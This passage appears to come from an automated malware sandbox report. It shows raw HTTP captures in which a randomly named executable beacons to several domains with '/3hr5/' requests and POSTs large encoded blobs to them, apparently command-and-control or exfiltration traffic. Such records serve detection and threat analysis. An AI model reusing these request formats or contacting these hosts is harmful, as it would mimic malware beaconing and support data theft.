                                                                                                                              Dec 4, 2023 15:25:51.684015989 CET242INData Raw: 3a 20 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 72 6c 73 2e 6d 6f 6e 65 79 2f 33 68 72 35 2f 3f 54 5a 64 3d 52 42 63 6e 53 69 43 67 30 65 78 67 50 48 37 2b 61 6d 76 79 75 66 66 7a 47 44 34 7a 70 35 76 35 51 4a 7a 70 45 57 68 57 31
                                                                                                                              Data Ascii: : 0;url=https://www.brls.money/3hr5/?TZd=RBcnSiCg0exgPH7+amvyuffzGD4zp5v5QJzpEWhW15793hPIewihv82rGn5Qh8bR9T1h4/autzf2BuR5sC2Gt8s6p4k4sTzt/A==&1dr=yP5PQD38server: VercelRedirecting...


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              53192.168.11.205018454.36.145.173808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:25:59.909645081 CET535OUTGET /3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVEIx2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.hormigonesmil.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:26:02.051954031 CET775INHTTP/1.1 301 Moved Permanently
                                                                                                                              date: Mon, 04 Dec 2023 14:26:01 GMT
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              transfer-encoding: chunked
                                                                                                                              server: Apache
                                                                                                                              x-powered-by: PHP/7.4
                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                              wpo-cache-status: not cached
                                                                                                                              wpo-cache-message: In the settings, caching is disabled for matches for one of the current request's GET parameters
                                                                                                                              x-redirect-by: WordPress
                                                                                                                              location: http://hormigonesmil.com/3hr5/?TZd=5u0YN/vG2OQgb1C/S61rdtzCPX+hVrwZfQNDBdV1y3YbCYVEIx2nSMW53Cy3Ic7FhoOGTcSXNHOgJli1CYTDFI4tCK1dqGPzQQ==&1dr=yP5PQD38
                                                                                                                              x-iplb-request-id: BF60E3DC:C408_362491AD:0050_656DE178_114DD5:6292
                                                                                                                              x-iplb-instance: 52473
                                                                                                                              connection: close
                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              54192.168.11.205018574.208.236.243808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:26:15.404470921 CET816OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.homesteadmath.com
                                                                                                                              Referer: http://www.homesteadmath.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 50 35 43 65 76 56 56 54 71 39 7a 6f 63 4a 43 38 54 4f 44 30 5a 53 47 57 45 48 33 78 68 43 63 30 43 53 62 58 7a 71 30 64 61 4c 36 30 54 76 35 34 39 67 51 35 48 6c 34 75 46 7a 69 2f 63 30 35 68 2b 52 77 43 73 4d 44 38 2b 6d 33 38 50 72 37 51 78 61 4d 50 71 31 78 37 2b 31 2f 33 70 42 71 69 50 77 43 46 35 4a 58 78 31 4d 43 41 54 54 53 79 44 68 71 44 57 37 5a 66 54 72 76 51 73 61 4e 6f 79 77 78 36 66 36 43 58 4b 4a 65 4b 68 35 37 44 53 51 4d 61 64 66 72 43 68 64 73 77 5a 77 66 6b 63 74 44 76 4c 6d 32 72 35 73 6c 4b 4b 42 7a 30 5a 41 3d 3d
                                                                                                                              Data Ascii: TZd=P5CevVVTq9zocJC8TOD0ZSGWEH3xhCc0CSbXzq0daL60Tv549gQ5Hl4uFzi/c05h+RwCsMD8+m38Pr7QxaMPq1x7+1/3pBqiPwCF5JXx1MCATTSyDhqDW7ZfTrvQsaNoywx6f6CXKJeKh57DSQMadfrChdswZwfkctDvLm2r5slKKBz0ZA==
                                                                                                                              Dec 4, 2023 15:26:15.535440922 CET634INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:26:15 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              55192.168.11.205018674.208.236.243808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:26:18.044367075 CET1156OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.homesteadmath.com
                                                                                                                              Referer: http://www.homesteadmath.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 50 35 43 65 76 56 56 54 71 39 7a 6f 64 70 79 38 53 70 76 30 4d 69 47 56 64 33 33 78 76 69 63 77 43 53 58 58 7a 72 77 4e 61 35 65 30 54 4f 4a 34 38 68 51 35 45 6c 34 75 4f 54 69 41 66 45 35 6d 2b 52 73 38 73 4d 50 38 2b 6d 54 38 4e 5a 7a 51 30 71 4d 4d 6b 56 78 38 70 46 2f 30 2b 78 72 74 50 77 47 6a 35 4d 2f 78 31 38 2b 41 53 51 36 79 51 44 43 41 52 62 5a 5a 56 72 76 50 6d 36 4e 71 79 77 73 48 66 34 53 70 4b 37 43 4b 6d 61 7a 44 41 41 4d 46 48 66 71 49 76 4e 74 44 49 7a 36 68 61 2b 37 67 56 55 4b 47 34 2f 46 65 4c 6c 36 50 4e 61 74 36 4a 6f 2f 70 42 61 32 61 37 33 49 77 77 31 64 6b 56 75 4a 70 74 5a 62 58 49 66 53 4f 59 33 33 76 72 49 4d 54 38 55 4e 35 63 48 55 6b 5a 76 50 53 77 55 5a 4e 74 48 45 71 6c 30 6c 55 71 76 7a 7a 49 69 79 57 62 42 37 77 4a 48 4d 41 42 4a 61 32 6d 49 62 64 44 77 62 58 30 4e 4d 49 63 78 54 68 78 62 4b 61 61 65 4b 44 4e 4b 78 34 33 6c 35 4b 44 77 61 7a 41 67 69 34 73 39 5a 55 51 6a 6c 4b 64 5a 4b 44 6b 43 2b 37 6b 79 2f 4f 59 56 4d 58 68 42 51 74 73 58 36 46 78 46 4e 45 4b 6f 4b 44 77 66 30 2b 68 30 63 63 4f 68 30 38 63 67 52 55 70 68 4e 4e 63 5a 52 68 4a 69 64 53 48 74 37 71 30 70 42 77 4b 49 49 37 41 51 52 33 30 57 2b 33 6a 34 56 65 37 59 43 77 50 36 58 7a 50 72 41 66 50 44 4b 32 57 38 30 67 6e 5a 33 53 6c 58 65 7a 48 71 75 48 54 72 36 48 58 33 44 55 61 71 4e 43 6b 55 6b 52 75 6c 70 31 37 66 42 4e 4a 78 39 43 30 38 37 63 2f 2f 5a 44 6b 62 36 37 59 6a 31 77 62 53 49 63 4f 57 33 54 30 70 74 77 36 53 44 4a 6e 72 72 52 53 4c 69 33 68 6a 6d 7a 78 4c 71 78 4c 4d 6a 44 33 78 77 5a 31 4c 52 31 66 57 70 63 75 72 34 3d
                                                                                                                              Data Ascii: TZd=P5CevVVTq9zodpy8Spv0MiGVd33xvicwCSXXzrwNa5e0TOJ48hQ5El4uOTiAfE5m+Rs8sMP8+mT8NZzQ0qMMkVx8pF/0+xrtPwGj5M/x18+ASQ6yQDCARbZZVrvPm6NqywsHf4SpK7CKmazDAAMFHfqIvNtDIz6ha+7gVUKG4/FeLl6PNat6Jo/pBa2a73Iww1dkVuJptZbXIfSOY33vrIMT8UN5cHUkZvPSwUZNtHEql0lUqvzzIiyWbB7wJHMABJa2mIbdDwbX0NMIcxThxbKaaeKDNKx43l5KDwazAgi4s9ZUQjlKdZKDkC+7ky/OYVMXhBQtsX6FxFNEKoKDwf0+h0ccOh08cgRUphNNcZRhJidSHt7q0pBwKII7AQR30W+3j4Ve7YCwP6XzPrAfPDK2W80gnZ3SlXezHquHTr6HX3DUaqNCkUkRulp17fBNJx9C087c//ZDkb67Yj1wbSIcOW3T0ptw6SDJnrrRSLi3hjmzxLqxLMjD3xwZ1LR1fWpcur4=
                                                                                                                              Dec 4, 2023 15:26:18.172804117 CET634INHTTP/1.1 404 Not Found
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Date: Mon, 04 Dec 2023 14:26:18 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              56192.168.11.205018774.208.236.243808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:26:20.686492920 CET6484OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.homesteadmath.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.homesteadmath.com
                                                                                                                              Referer: http://www.homesteadmath.com/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 52912
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 50 35 43 65 76 56 56 54 71 39 7a 6f 64 70 79 38 53 70 76 30 4d 69 47 56 64 33 33 78 76 69 63 77 43 53 58 58 7a 72 77 4e 61 35 57 30 54 34 56 34 36 43 34 35 46 6c 34 75 4e 54 69 42 66 45 34 6a 2b 52 31 37 73 4d 54 43 2b 6b 37 38 4e 4c 4c 51 7a 59 55 4d 75 31 78 39 6c 6c 2f 32 70 42 72 35 50 77 43 4e 35 4d 72 48 31 4d 61 41 54 53 69 79 53 43 43 44 62 72 5a 66 56 72 76 4c 69 36 4e 55 79 77 6f 74 66 34 65 70 4b 35 6d 4b 67 76 2f 44 54 6e 34 46 54 2f 71 4c 70 39 74 4d 52 44 36 55 61 39 48 53 56 55 4b 57 34 2b 52 65 4c 69 4f 50 4d 64 35 39 4d 34 2f 70 65 71 32 64 6f 6e 4d 30 77 31 42 73 56 74 56 70 74 65 48 58 48 66 53 4f 4b 6a 6a 75 39 59 4d 56 72 45 4e 75 4b 33 59 57 5a 76 72 67 77 52 5a 4e 74 33 41 71 6e 44 46 55 6d 75 7a 7a 49 43 79 49 56 68 37 5a 48 6e 4d 55 42 4a 4b 51 6d 4a 37 6a 44 77 76 58 31 73 73 49 4d 6a 37 69 68 72 4b 55 44 65 4b 73 62 36 39 6b 33 6b 4a 57 44 77 61 6a 41 68 32 34 73 4e 70 55 54 6e 78 4c 65 4a 4c 4c 73 69 2b 71 76 53 44 41 59 52 6b 66 68 42 30 48 73 55 57 46 78 6c 4e 45 42 72 69 41 36 76 30 31 2b 45 63 4f 4e 52 31 6d 63 68 73 48 70 67 59 34 64 6f 39 68 4a 52 6c 53 4e 64 37 70 79 4a 42 30 66 34 49 39 54 41 52 33 30 57 6a 47 6a 34 5a 65 37 70 36 77 4f 4e 72 7a 4e 38 55 66 4e 44 4b 77 57 38 30 78 6e 5a 72 70 6c 58 57 64 48 72 65 74 54 6f 4b 48 55 6a 50 55 58 50 78 42 67 6b 6b 55 71 6c 6f 31 31 2f 4e 57 4a 78 78 4b 30 38 71 70 38 49 42 44 6e 62 4b 37 50 44 31 76 64 79 49 58 4a 57 33 2f 6a 5a 78 73 36 53 76 6a 6e 71 76 34 53 4c 4b 33 6a 31 33 6c 75 49 4f 55 51 75 6e 39 7a 42 6b 30 36 59 56 45 46 45 74 6a 37 2b 72 5a 47 77 45 33 66 65 72 4d 72 56 72 4b 47 65 4a 70 2b 63 73 37 56 71 4c 39 6b 56 31 48 2f 79 43 38 2f 65 58 42 64 72 69 4e 46 41 69 35 4f 62 31 63 44 6a 57 6b 36 50 4e 46 54 42 35 79 64 33 76 35 61 42 4f 46 44 67 62 48 62 45 62 7a 79 56 57 68 65 31 58 44 70 6d 52 76 76 38 41 42 4a 71 6a 49 41 63 4d 55 62 4e 30 33 64 6f 6b 45 73 45 4a 41 2b 42 37 76 49 77 30 38 54 69 6b 4f 48 4b 2b 32 77 41 39 66 4f 6f 64 56 31 4b 33 6e 51 73 50 44 4d 69 58 49 45 61 38 43 4b 39 5a 37 30 77 61 66 6b 46 5a 39 72 5a 58 68 54 73 38 6a 2b 79 54 45 2f 64 44 55 6c 68 68 64 4f 70 56 69 4d 73 79 68 6a 31 61 57 78 78 76 32 33 46 66 55 53 76 63 69 63 79 57 66 45 77 70 57 48 54 6c 2f 44 62 63 63 32 36 64 33 6b 65 51 52 34 34 52 41 65 2b 6f 4a 68 66 69 65 5a 61 37 4f 64 30 5a 6c 62 76 62 61 39 50 63 5a 55 64 43 41 73 76 4f 46 6a 4a 43 4b 7a 42 44 4a 4c 66 52 77 6d 56 50 30 50 78 31 73 70 43 4f 69 63 78 30 69 4f 4e 62 59 45 50 76 66 34 65 35 43 6a 79 47 37 73 63 43 75 37 4e 73 37 41 71 45 4d 6e 54 41 6b 33 7a 44 78 79 52 37 51 39 4b 72 36 32 55 35 49 47 6a 32 37 56 67 67 43 50 31 6e 2f 69 6d 77 48 33 50 33 31 76 6b 47 79 61 37 39 58 37 58 6c 56 64 54 2b 39 2f 59 73 69 48 6b 51 73 37 37 72 74 2f 4a 2f 6a 71 5a 49 63 54 37 66 4d 33 4a 49 76 6b 75 4a 44 7a 62 30 56 63 4b 48 45 38 61 61 7a 61 54 76 70 70 6c 53 38 63 5a 58 45 69 2b 79 57 5a 64 62 5a 56 79 48 50 72 2f 59 44 6a 56 72 33 46 41 70 4d 72 45 7a 52 75 61 79 4b 65 2b 68 71 43 31 73 69 4c 65 72 5a 67 46 31 6a 61 62 2b 36 6e 72 79 4e 6e 43 58 33 2b 34 2f 4d 6c 69 62 71 41 45 6a 52 68 31 4e 69 41 6e 49 54 4a 56 76 45 51 73 68 77 56 69 47 4d 37 51 79 4f 57 34 43 43 4c 35 77 53 37 57 55 6e 47 49 76 59 61 50 63 6a 6c 43 2f 58 76 51 46 79 2f 44 63 52 56 54 35 4a 36 64 6e 41 43 4a 7a 39 63 4b 30 43 48 45 70 59 41 70 4a 77 73 39 68 75 4a 33 46 65 31 77 61 2b 58 37 6a 44 6c 33 68 34 32 50 32 66 44 71 42 66 42 67 76 42 37 69 31 68 75 58 43 64 5a 6f 30 45 4b 59 58 79 56 63 36 76 56 36 38 55 32 49 5a 4c 44 2f 76 53 39 65 63 74 79 67 50 79 34 6e 6d 37 4a 59 63 31 39 44 79 34 34 71 5a 77 56 4a 52 42 36 45 71 41 71 71 59 36 2b 69 73 69 73 74 71 59 2b 51 54 68 4c 55 77 79 77 33 73 65 69 54 59 6c 70 58 53 72 54 59 77 55 32 41 4a 65 38 6b 51 2b 44 4d 44 2f 36 39 6c 74 78 4a 35 64 33 47 39 4c 45 53 59 79 7a 55 66 4a 31 55 6f 6a 58 6f 48 77 7a 2b 52 64 50 43 4c 76 41 52 44 6f 33 6a 55 46 48 2f 43 4e 4b 70 76 49 52 44 4b 37 4d 75 4f 4b 42 59 5a 67 45 47 7a 58 43 38 62 5a 2b 6f 5a 65 37 52 4c 4c 4e 4a 4e 42 4f 41 64 76 74 59 6e 32 45 52 69 6a 37 46 75 53 54 6e 41 49 36 31 39
                                                                                                                              Data Ascii: TZd=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